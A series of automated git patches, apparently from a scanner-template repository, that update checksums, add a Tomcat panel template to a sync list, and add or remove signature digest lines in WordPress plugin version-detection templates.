http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8901,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a45ab7aead126b324aecfb4cee761bcf6012b683 +templates-checksum.txt:eb7f1e8235a08b8ec17727b2ad8217c12df79a7d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4bba214bc6409c2f0a468d20eeabb694f5a3e2a2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 20 Jul 2024 06:03:18 +0000 Subject: [PATCH 1464/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 807562b71b..b597d89480 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -27,6 +27,7 @@ on: - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/freshrss-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' + - 'http/exposed-panels/tomcat/tomcat-exposed.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/exposures/files/adcs-certificate.yaml' From b7b7fa34625ef53d44d171ce6e5961a20fefdab8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Jul 2024 06:04:24 +0000 Subject: [PATCH 1465/1841] Auto Template Signing [Sat Jul 20 06:04:24 UTC 2024] :robot: --- http/exposed-panels/tomcat/tomcat-exposed.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/tomcat/tomcat-exposed.yaml b/http/exposed-panels/tomcat/tomcat-exposed.yaml index 08a1c0840b..f024ff2197 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed.yaml @@ -48,3 +48,4 @@ http: - 'Version\s+([0-9.]+),' - '(?i)/lib/([a-z0-9.]+)/webapps' - '(?i)

    Apache\s+Tomcat/([0-9.]+)' +# digest: 4a0a0047304502202fb2b2a75362e8229a4108b0e1775c34d967a9d09b59c47974b10ce4b6ddfbb0022100a592295b994b952182db3f57817bd0baec02b17f18c542d6814631085a43c7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7d9d7ddd27b299433aae78034908f2ebf0b46968 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 00:21:52 +0000 Subject: [PATCH 1466/1841] Auto WordPress Plugins Update [Sun Jul 21 00:21:52 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 200 files changed, 200 deletions(-) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index bcf1cea0d7..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e3076ae8a27cd309fd2ca5325741bdd59bb2b5543a463fa9997ac6c130747e2022100fcd5e57a53b7213c0e4f0c2a672a3384bc086895b325061b5dbebf1086de497e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 3f24601352..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014ce7c0619240471c7a7b42f914bda802ecc002d40aa437ff183b7443b0059f30220150eb70e474c065fb52e75b60b0c943c7d80c0952c22e7b81126c5a0a3bfb2bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index e73fb10b05..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089bf1f6b56884de103aefa1fce048610e38e68eb8134cdb3f84597406f22e95f02201f12088da4e6078d19309014b2d41d4d2c8dfd11aa57dd109c0f8ba38e07b652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 08d84c5371..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203275413e7b312ad52f4de46ff746693678bbf5c282d19796c1b2d8117606a840022100ef10a9263f4aebdce15eb1fd8fc03930341f2a478b0c38a75d9a0e96ae6c7f71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 1c5fa546bf..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021257a2d4d9057ffab4365d7cd463bf9d0465be005c5682c8cd3e3eb26690abc022100b07febf88d29df1ec853b0ebd8890a06d39a60a707b64842c033f2d432c6f7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 4e2038f2b8..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a775ab47573b4d8a3efef77ac010adf4c63f0989b9420717d1da8fba825277b2022100d7b511ee4015ebc0ad0192ceb89a2add8fdb18b324ba7cfa3ca3873239773b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index ffeee10b41..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071e2956a9a815dd665806ce19a05a03a847e4296e218eb0574953ca7f218db990221009fc414157a9ea649fcc0deb7884f32c4c6863f5cf5f487babdc777c6de32408b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index c148ea890b..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100850597b0a63b62d8888654de84df8e1688653af0b50fa17f833def480be0556f02206ca181f1c5ac934ccfab291a3db6a2d39d58a4505896d2c93214903302addb9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 6a5baaa663..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d15243e8c4b71531796e4a0097ffd40fc1d0fd01e2d2b93df04d0dd89305726a022100f3fe432975b77b62338abac52ea0f1023d056ec167b86459c23a9ea1da80ed33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 9284d9ab83..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042f489f2acbfac0b44a3e9737c1cdda7da880b1e256cf6bc9a8038e6af1e9094022100e3519557cfb18c520052964285359d1858403c3ad6aff9cbe8313e38df44e2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 02aae718cd..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059aefc69835160d182daedb5b72ce377b3f332df04ae1bbd15258e4423ca6fa6022100cda5ae2fa950406bdf93c7ac1495c6da9137248a746095cb35c0863b09b4d2f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1a5549f1f1..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079c72dec52bea72073ddd3ff619c2a30360605e46ef6bf5b655149e681011557022100d43a68ba5a4be646aa9d945c3d19e3c3b3cc47dd6f41d0dedbd25a66416e793f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index feb7d746e8..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007dae5105d3e535efbadae3989d1b35a33813c78babf6969cb6fc0812b8cd3b402204a1269fd9d0555e0dd3db37b01f3655ed7716330a97f33d71c17ca58fc263b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 34b8646b79..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fdb90930eb827d6a012c92c1cc01aed1a965c28ca4ad995d468fc93bd91b7c57022047e42a372718116fbaa58f68d3e9a4e92cdf6620c0f04d6f6ba10c5e6a794067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 173ead5870..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ac3f323716588786298519b1d13645e31caf4c87491326a7f05a058fd65a1e102203c1fa8b4e65584eae1938733bce084b7b9e5211bd78a284af8be2f39749708b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index d47c9584ec..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220285e192d72d981b897fea3102c63001c4fbef2839cd87c3c35d10a4544441b2f022070e314ebe5d750a7540a1d39091ea7d13470bfa87f26aa98749b3b9a4b3af61f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index a4a64b7faf..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf278e470205131067df70b2eccf9967a5497e69ce419d34359202fc992272ad022100cdd78125aa63387b31597537873a2561840cf12d316ba7d505c1f5a670cf9baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d2a31c870c..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c15ee3aedfe38775c10d0369c53e6a85a2e299accef73b4b4ba374abe1c8f0302206e2194b81c7cef4d62baca45504319cc96473d9749e0977d4277fb5eda9c51c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 800109bf68..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f234ac201cb35effcb4397ac16be0ce6d8f1a50ac577b77ca7e3d8e817485be002203ecb3f64b92f38a5dc0ddfefc1ce06674d62d8b8d778fb4476545fed916c098b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 46467dae4e..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207574f8ea2be4a995f04905f4f05c5b70d163a9efbc5bdaa73ad5e542738fd967022100c4603534355d76531118aa2e876a442b9facab57d80b3b58b38fda7bddb24672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index ec0e1f50c6..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034fc78d9437cf000a0188b0382324f5442c93e245c8ba42ce31ab42159dadee0022100e7584e193db3be1d91148b7e3c6676e7d383914911418151c3182e3874378984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 1250f183af..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f8f87c7ae6cf98c9604135cbc9402c2e97ae39b836f4f67ed5c103dfa78cde5022100a694caaa5cb8f2e3e055ff249d058bde74fa2c76fb0ed58fe37aa52b2380a43b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index d28ec09273..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 